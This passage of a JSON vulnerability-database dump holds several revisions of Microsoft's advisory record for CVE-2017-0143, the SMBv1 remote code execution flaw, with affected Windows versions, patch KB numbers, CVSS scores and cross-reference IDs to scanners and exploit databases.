"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T15:08:23", "differentElements": ["msAffectedSoftware"], "edition": 32}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T16:48:04", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": 
["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4013198", "KB3210721", "KB4012214", "KBMS16-110, 3187754", "KB4012598", "KB4012215", "KB3177186", "KB3210720", "KB3212646", "KB4012217", "KB4013429", "KB3205409", "KB4012216", "KB3213986", "KB4012212", "KB4012606", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, 
{"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": 
"KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 
"KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", 
"kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T16:48:04", "differentElements": ["msAffectedSoftware"], "edition": 33}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-11T19:05:15", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 
"RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-11T11:22:34", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-11T11:22:34", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012217", "KB3177186", "KB3213986", "KB4012216", "KB4012214", "KB4012215", "KB4012212", "KB4012598", "KB3210721", "KB3212646", "KB4012606", "KB4013198", "KBMS16-110, 3187754", "KB3210720", "KB4013429", "KB3205401", "KB3205409", "KB4012213"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", 
"kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 
for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-11T19:05:15", "differentElements": ["msAffectedSoftware"], "edition": 34}, {"bulletin": {"id": 
